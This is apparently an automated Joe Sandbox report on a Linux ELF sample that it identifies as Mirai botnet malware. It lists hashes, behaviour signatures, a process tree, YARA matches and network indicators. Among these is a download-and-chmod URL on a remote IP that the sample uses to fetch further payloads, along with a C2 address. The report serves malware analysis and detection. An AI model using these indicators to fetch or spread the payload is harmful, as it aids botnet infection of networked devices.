Linux Analysis Report
xd.x86_64.elf

Overview

General Information

Sample name:xd.x86_64.elf
Analysis ID:1654966
MD5:e59bf6760fd1be7b7fdb51b0c8038c27
SHA1:29b0741492548fc34e5c2ec6855f9240dbeb0788
SHA256:cd21516feb04d3b1fa6eac9d7db9b633d965f63fd93efaf3f6f042f894302f67
Tags:elfuser-abuse_ch

Detection

Mirai
Score:88
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample deletes itself
Sample is packed with UPX
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654966
Start date and time:2025-04-02 20:47:21 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:xd.x86_64.elf
Detection:MAL
Classification:mal88.spre.troj.evad.linELF@0/16@3/0
  • Connection to analysis system has been lost, crash info: Unknown
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: http://213.209.129.92/d/xd.arm7;chmod
  • system is lnxubuntu20
  • dash New Fork (PID: 6222, Parent: 4336)
  • rm (PID: 6222, Parent: 4336, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
  • dash New Fork (PID: 6223, Parent: 4336)
  • cat (PID: 6223, Parent: 4336, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.HvEmy83FD7
  • dash New Fork (PID: 6224, Parent: 4336)
  • head (PID: 6224, Parent: 4336, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6225, Parent: 4336)
  • tr (PID: 6225, Parent: 4336, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6226, Parent: 4336)
  • cut (PID: 6226, Parent: 4336, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6227, Parent: 4336)
  • cat (PID: 6227, Parent: 4336, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.HvEmy83FD7
  • dash New Fork (PID: 6228, Parent: 4336)
  • head (PID: 6228, Parent: 4336, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6229, Parent: 4336)
  • tr (PID: 6229, Parent: 4336, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6230, Parent: 4336)
  • cut (PID: 6230, Parent: 4336, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6231, Parent: 4336)
  • rm (PID: 6231, Parent: 4336, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
  • systemd New Fork (PID: 6273, Parent: 1)
  • journalctl (PID: 6273, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6290, Parent: 1)
  • systemd New Fork (PID: 6293, Parent: 1)
  • systemd New Fork (PID: 6294, Parent: 1)
  • systemd New Fork (PID: 6295, Parent: 1)
  • systemd New Fork (PID: 6296, Parent: 1)
  • systemd New Fork (PID: 6334, Parent: 1)
  • systemd New Fork (PID: 6366, Parent: 1)
  • systemd New Fork (PID: 6367, Parent: 1)
  • systemd New Fork (PID: 6369, Parent: 1)
  • systemd New Fork (PID: 6372, Parent: 1)
  • systemd New Fork (PID: 6374, Parent: 1860)
  • pulseaudio (PID: 6374, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • gdm3 New Fork (PID: 6375, Parent: 1320)
  • Default (PID: 6375, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6376, Parent: 1320)
  • Default (PID: 6376, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6378, Parent: 1320)
  • Default (PID: 6378, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6381, Parent: 1)
  • gpu-manager (PID: 6381, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 6383, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6384, Parent: 6383)
      • grep (PID: 6384, Parent: 6383, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6385, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6386, Parent: 6385)
      • grep (PID: 6386, Parent: 6385, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6388, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6389, Parent: 6388)
      • grep (PID: 6389, Parent: 6388, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6391, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6392, Parent: 6391)
      • grep (PID: 6392, Parent: 6391, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6393, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6395, Parent: 6393)
      • grep (PID: 6395, Parent: 6393, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6396, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6397, Parent: 6396)
      • grep (PID: 6397, Parent: 6396, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6399, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6400, Parent: 6399)
      • grep (PID: 6400, Parent: 6399, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6402, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6403, Parent: 6402)
      • grep (PID: 6403, Parent: 6402, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 6387, Parent: 1)
  • systemd New Fork (PID: 6390, Parent: 1)
  • systemd New Fork (PID: 6394, Parent: 1)
  • systemd New Fork (PID: 6398, Parent: 1)
  • systemd New Fork (PID: 6401, Parent: 1)
  • systemd New Fork (PID: 6405, Parent: 1)
  • generate-config (PID: 6405, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6406, Parent: 6405, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6407, Parent: 1)
  • gdm-wait-for-drm (PID: 6407, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • gdm3 (PID: 6408, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • fusermount (PID: 6433, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • gpu-manager (PID: 6443, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6453, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6463, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6473, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6483, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • plymouth (PID: 6493, Parent: 1, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: /bin/plymouth quit
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Author: Joe Security
Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_9e9530a7, Description: unknown, Author: unknown
  • 0xe3c8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_807911a2, Description: unknown, Author: unknown
  • 0xebb7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      No Suricata rule has matched

      AV Detection

      Source: xd.x86_64.elf, ReversingLabs: Detection: 44%
      Source: /usr/bin/pulseaudio (PID: 6374), Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pkill (PID: 6406), Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: global traffic, TCP traffic: 192.168.2.23:52458 -> 213.209.129.92:5466
      Source: global traffic, HTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1 Host: daisy.ubuntu.com Accept: */* Content-Type: application/octet-stream X-Whoopsie-Version: 0.2.69ubuntu0.3 Content-Length: 164887 Expect: 100-continue
      Source: /tmp/xd.x86_64.elf (PID: 6261), Socket: 0.0.0.0:23
      Source: /tmp/xd.x86_64.elf (PID: 6261), Socket: 0.0.0.0:0
      Source: /tmp/xd.x86_64.elf (PID: 6261), Socket: 0.0.0.0:80
      Source: /tmp/xd.x86_64.elf (PID: 6261), Socket: 0.0.0.0:81
      Source: /tmp/xd.x86_64.elf (PID: 6261), Socket: 0.0.0.0:8443
      Source: /tmp/xd.x86_64.elf (PID: 6261), Socket: 0.0.0.0:9009
      Source: global traffic, DNS traffic detected: DNS query: daisy.ubuntu.com
      Source: unknown, HTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1 Host: daisy.ubuntu.com Accept: */* Content-Type: application/octet-stream X-Whoopsie-Version: 0.2.69ubuntu0.3 Content-Length: 164887 Expect: 100-continue
      Source: xd.x86_64.elf, 6260.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6262.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6263.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6264.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6265.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6266.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6268.1.0000000000400000.0000000000415000.r-x.sdmp, String found in binary or memory: http://213.209.129.92/d/xd.arm7;chmod
      Source: xd.x86_64.elf, String found in binary or memory: http://upx.sf.net
      Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 37606 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 37606
      Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_6a77af0f, Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_0cd591cd, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_a33a8363, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_0cd591cd, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_a33a8363, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_6a77af0f, Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_6a77af0f, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
